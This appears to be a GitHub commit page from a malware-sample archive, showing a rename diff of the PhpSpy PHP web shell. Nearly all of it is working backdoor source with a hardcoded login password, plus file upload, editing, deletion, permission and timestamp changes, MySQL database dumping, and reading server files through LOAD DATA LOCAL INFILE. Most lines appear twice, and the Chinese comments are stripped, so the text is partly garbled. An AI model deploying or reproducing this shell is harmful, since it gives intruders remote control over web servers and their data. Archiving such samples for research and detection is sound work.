Rename Trojan-Spy.PHP.PhPen.f to Backdoor.PHP.Phpshy.a.s

This commit is contained in:
vxunderground 2020-11-02 23:45:49 -06:00 committed by GitHub
parent 20884073a5
commit 2e53d3891f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,17 +2,17 @@
/***************************************************************************** /*****************************************************************************
===================== ==================== ===================== ====================
使 使
Sniper\Super·Hei\kEvin1986\saiy\wofeiwo Sniper\Super·Hei\kEvin1986\saiy\wofeiwo
17 17
====================== 使 ======================= ====================== 使 =======================
Codz by angel(4ngel) Codz by angel(4ngel)
@ -47,23 +47,23 @@ foreach(array('_GET','_POST') as $_request) {
} }
} }
/*===================== 程序配置 =====================*/ /*===================== 程序配置 =====================*/
$admin = array(); $admin = array();
// , true , false . // , true , false .
$admin['check'] = true; $admin['check'] = true;
// , // ,
$admin['pass'] = 'kolya'; $admin['pass'] = 'kolya';
// cookie , , , // cookie , , ,
// cookie // cookie
$admin['cookiepre'] = ''; $admin['cookiepre'] = '';
// cookie // cookie
$admin['cookiedomain'] = ''; $admin['cookiedomain'] = '';
// cookie // cookie
$admin['cookiepath'] = '/'; $admin['cookiepath'] = '/';
// cookie // cookie
$admin['cookielife'] = 86400; $admin['cookielife'] = 86400;
/*===================== 配置结束 =====================*/ /*===================== 配置结束 =====================*/
if ($charset == 'utf8') { if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8"); header("content-Type: text/html; charset=utf-8");
@ -78,7 +78,7 @@ if ($charset == 'utf8') {
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time(); $timestamp = time();
/*===================== 身份验证 =====================*/ /*===================== 身份验证 =====================*/
if ($action == "logout") { if ($action == "logout") {
scookie('phpspypass', '', -86400 * 365); scookie('phpspypass', '', -86400 * 365);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">'); p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
@ -102,11 +102,11 @@ if($admin['check']) {
loginpage(); loginpage();
} }
} }
/*===================== 验证结束 =====================*/ /*===================== 验证结束 =====================*/
$errmsg = ''; $errmsg = '';
// PHPINFO // PHPINFO
if ($action == 'phpinfo') { if ($action == 'phpinfo') {
if (IS_PHPINFO) { if (IS_PHPINFO) {
phpinfo(); phpinfo();
@ -115,7 +115,7 @@ if ($action == 'phpinfo') {
} }
} }
// //
if ($doing == 'downfile' && $thefile) { if ($doing == 'downfile' && $thefile) {
if (!@file_exists($thefile)) { if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent'; $errmsg = 'The file you want Downloadable was nonexistent';
@ -129,7 +129,7 @@ if ($doing == 'downfile' && $thefile) {
} }
} }
// //
if ($doing == 'backupmysql' && !$saveasfile) { if ($doing == 'backupmysql' && !$saveasfile) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
$table = array_flip($table); $table = array_flip($table);
@ -148,7 +148,7 @@ if ($doing == 'backupmysql' && !$saveasfile) {
exit; exit;
} }
// MYSQL // MYSQL
if($doing=='mysqldown'){ if($doing=='mysqldown'){
if (!$dbname) { if (!$dbname) {
$errmsg = 'Please input dbname'; $errmsg = 'Please input dbname';
@ -161,7 +161,7 @@ if($doing=='mysqldown'){
if(!$result){ if(!$result){
q("DROP TABLE IF EXISTS tmp_angel;"); q("DROP TABLE IF EXISTS tmp_angel;");
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
//,__angel_1111111111_eof__ //,__angel_1111111111_eof__
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
$result = q("select content from tmp_angel"); $result = q("select content from tmp_angel");
q("DROP TABLE tmp_angel"); q("DROP TABLE tmp_angel");
@ -247,7 +247,7 @@ formfoot();
$errmsg && m($errmsg); $errmsg && m($errmsg);
// //
!$dir && $dir = '.'; !$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir); $nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') { if (substr($dir, -1) != '/') {
@ -257,10 +257,10 @@ $uedir = ue($dir);
if (!$action || $action == 'file') { if (!$action || $action == 'file') {
// //
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable'; $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
// //
if ($doing == 'deldir' && $thefile) { if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) { if (!file_exists($thefile)) {
m($thefile.' directory does not exist'); m($thefile.' directory does not exist');
@ -269,7 +269,7 @@ if (!$action || $action == 'file') {
} }
} }
// //
elseif ($newdirname) { elseif ($newdirname) {
$mkdirs = $nowpath.$newdirname; $mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) { if (file_exists($mkdirs)) {
@ -280,19 +280,19 @@ if (!$action || $action == 'file') {
} }
} }
// //
elseif ($doupfile) { elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
} }
// //
elseif ($editfilename && $filecontent) { elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w'); $fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed')); m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
@fclose($fp); @fclose($fp);
} }
// //
elseif ($pfile && $newperm) { elseif ($pfile && $newperm) {
if (!file_exists($pfile)) { if (!file_exists($pfile)) {
m('The original file does not exist'); m('The original file does not exist');
@ -302,7 +302,7 @@ if (!$action || $action == 'file') {
} }
} }
// //
elseif ($oldname && $newfilename) { elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename; $nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) { if (file_exists($nname) || !file_exists($oldname)) {
@ -312,7 +312,7 @@ if (!$action || $action == 'file') {
} }
} }
// //
elseif ($sname && $tofile) { elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) { if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist'); m('The goal file has already existed or original file does not exist');
@ -321,7 +321,7 @@ if (!$action || $action == 'file') {
} }
} }
// //
elseif ($curfile && $tarfile) { elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) { if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist'); m('The goal file has already existed or original file does not exist');
@ -331,7 +331,7 @@ if (!$action || $action == 'file') {
} }
} }
// //
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) { elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) { if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist'); m(basename($curfile).' does not exist');
@ -341,7 +341,7 @@ if (!$action || $action == 'file') {
} }
} }
// //
elseif($doing == 'downrar') { elseif($doing == 'downrar') {
if ($dl) { if ($dl) {
$dfiles=''; $dfiles='';
@ -363,7 +363,7 @@ if (!$action || $action == 'file') {
} }
} }
// //
elseif($doing == 'delfiles') { elseif($doing == 'delfiles') {
if ($dl) { if ($dl) {
$dfiles=''; $dfiles='';
@ -375,13 +375,13 @@ if (!$action || $action == 'file') {
$fail++; $fail++;
} }
} }
m('Deleted file have finishedchoose '.count($dl).' success '.$succ.' fail '.$fail); m('Deleted file have finishedchoose '.count($dl).' success '.$succ.' fail '.$fail);
} else { } else {
m('Please select file(s)'); m('Please select file(s)');
} }
} }
// //
formhead(array('name'=>'createdir')); formhead(array('name'=>'createdir'));
makehide('newdirname'); makehide('newdirname');
makehide('dir',$nowpath); makehide('dir',$nowpath);
@ -516,14 +516,14 @@ function godir(dir,view_writable){
p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>'); p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
// //
$dirdata=array(); $dirdata=array();
$filedata=array(); $filedata=array();
if ($view_writable) { if ($view_writable) {
$dirdata = GetList($nowpath); $dirdata = GetList($nowpath);
} else { } else {
// //
$dirs=@opendir($dir); $dirs=@opendir($dir);
while ($file=@readdir($dirs)) { while ($file=@readdir($dirs)) {
$filepath=$nowpath.$file; $filepath=$nowpath.$file;
@ -826,7 +826,7 @@ function settable(tablename,doing,page) {
} }
</script> </script>
<?php <?php
// //
formhead(array('name'=>'recordlist')); formhead(array('name'=>'recordlist'));
makehide('doing'); makehide('doing');
makehide('action','sqladmin'); makehide('action','sqladmin');
@ -835,7 +835,7 @@ function settable(tablename,doing,page) {
p($dbform); p($dbform);
formfoot(); formfoot();
// //
formhead(array('name'=>'setdbname')); formhead(array('name'=>'setdbname'));
makehide('action','sqladmin'); makehide('action','sqladmin');
p($dbform); p($dbform);
@ -844,7 +844,7 @@ function settable(tablename,doing,page) {
} }
formfoot(); formfoot();
// //
formhead(array('name'=>'settable')); formhead(array('name'=>'settable'));
makehide('action','sqladmin'); makehide('action','sqladmin');
p($dbform); p($dbform);
@ -864,12 +864,12 @@ function settable(tablename,doing,page) {
} }
if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
// //
$mysqlver = mysql_get_server_info(); $mysqlver = mysql_get_server_info();
p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>'); p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
$highver = $mysqlver > '4.1' ? 1 : 0; $highver = $mysqlver > '4.1' ? 1 : 0;
// //
$query = q("SHOW DATABASES"); $query = q("SHOW DATABASES");
$dbs = array(); $dbs = array();
$dbs[] = '-- Select a database --'; $dbs[] = '-- Select a database --';
@ -1347,7 +1347,7 @@ else {
<?php <?php
/*====================================================== /*======================================================
======================================================*/ ======================================================*/
function m($msg) { function m($msg) {
@ -1397,7 +1397,7 @@ function multi($num, $perpage, $curpage, $tablename) {
} }
return $multipage; return $multipage;
} }
// //
function loginpage() { function loginpage() {
?> ?>
<style type="text/css"> <style type="text/css">
@ -1452,7 +1452,7 @@ function cf($fname,$text){
} }
} }
// //
function debuginfo() { function debuginfo() {
global $starttime; global $starttime;
$mtime = explode(' ', microtime()); $mtime = explode(' ', microtime());
@ -1460,7 +1460,7 @@ function debuginfo() {
echo 'Processed in '.$totaltime.' second(s)'; echo 'Processed in '.$totaltime.' second(s)';
} }
// //
function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') { function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) { if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
p('<h2>Can not connect to MySQL server</h2>'); p('<h2>Can not connect to MySQL server</h2>');
@ -1480,7 +1480,7 @@ function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
return $link; return $link;
} }
// //
function s_array(&$array) { function s_array(&$array) {
if (is_array($array)) { if (is_array($array)) {
foreach ($array as $k => $v) { foreach ($array as $k => $v) {
@ -1492,7 +1492,7 @@ function s_array(&$array) {
return $array; return $array;
} }
// HTML // HTML
function html_clean($content) { function html_clean($content) {
$content = htmlspecialchars($content); $content = htmlspecialchars($content);
$content = str_replace("\n", "<br />", $content); $content = str_replace("\n", "<br />", $content);
@ -1501,7 +1501,7 @@ function html_clean($content) {
return $content; return $content;
} }
// //
function getChmod($filepath){ function getChmod($filepath){
return substr(base_convert(@fileperms($filepath),10,8),-4); return substr(base_convert(@fileperms($filepath),10,8),-4);
} }
@ -1544,7 +1544,7 @@ function getUser($filepath) {
return ''; return '';
} }
// //
function deltree($deldir) { function deltree($deldir) {
$mydir=@dir($deldir); $mydir=@dir($deldir);
while($file=$mydir->read()) { while($file=$mydir->read()) {
@ -1562,13 +1562,13 @@ function deltree($deldir) {
return @rmdir($deldir) ? 1 : 0; return @rmdir($deldir) ? 1 : 0;
} }
// //
function bg() { function bg() {
global $bgc; global $bgc;
return ($bgc++%2==0) ? 'alt1' : 'alt2'; return ($bgc++%2==0) ? 'alt1' : 'alt2';
} }
// //
function getPath($scriptpath, $nowpath) { function getPath($scriptpath, $nowpath) {
if ($nowpath == '.') { if ($nowpath == '.') {
$nowpath = $scriptpath; $nowpath = $scriptpath;
@ -1581,7 +1581,7 @@ function getPath($scriptpath, $nowpath) {
return $nowpath; return $nowpath;
} }
// //
function getUpPath($nowpath) { function getUpPath($nowpath) {
$pathdb = explode('/', $nowpath); $pathdb = explode('/', $nowpath);
$num = count($pathdb); $num = count($pathdb);
@ -1593,7 +1593,7 @@ function getUpPath($nowpath) {
return $uppath; return $uppath;
} }
// PHP // PHP
function getcfg($varname) { function getcfg($varname) {
$result = get_cfg_var($varname); $result = get_cfg_var($varname);
if ($result == 0) { if ($result == 0) {
@ -1605,7 +1605,7 @@ function getcfg($varname) {
} }
} }
// //
function getfun($funName) { function getfun($funName) {
return (false !== function_exists($funName)) ? 'Yes' : 'No'; return (false !== function_exists($funName)) ? 'Yes' : 'No';
} }
@ -1672,7 +1672,7 @@ function sizecount($size) {
return $size; return $size;
} }
// //
class PHPZip{ class PHPZip{
var $out=''; var $out='';
function PHPZip($dir) { function PHPZip($dir) {
@ -1680,7 +1680,7 @@ class PHPZip{
$curdir = getcwd(); $curdir = getcwd();
if (is_array($dir)) $filelist = $dir; if (is_array($dir)) $filelist = $dir;
else{ else{
$filelist=$this -> GetFileList($dir);//文件列表 $filelist=$this -> GetFileList($dir);//文件列表
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
} }
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
@ -1703,7 +1703,7 @@ class PHPZip{
else return 0; else return 0;
} }
// //
function GetFileList($dir){ function GetFileList($dir){
static $a; static $a;
if (is_dir($dir)) { if (is_dir($dir)) {
@ -1803,7 +1803,7 @@ class PHPZip{
} }
} }
// //
function sqldumptable($table, $fp=0) { function sqldumptable($table, $fp=0) {
$tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump = "DROP TABLE IF EXISTS $table;\n";
$tabledump .= "CREATE TABLE $table (\n"; $tabledump .= "CREATE TABLE $table (\n";
@ -1980,11 +1980,11 @@ function formfoot(){
p('</form>'); p('</form>');
} }
// //
function pr($a) { function pr($a) {
echo '<pre>'; echo '<pre>';
print_r($a); print_r($a);
echo '</pre>'; echo '</pre>';
} }
?> ?>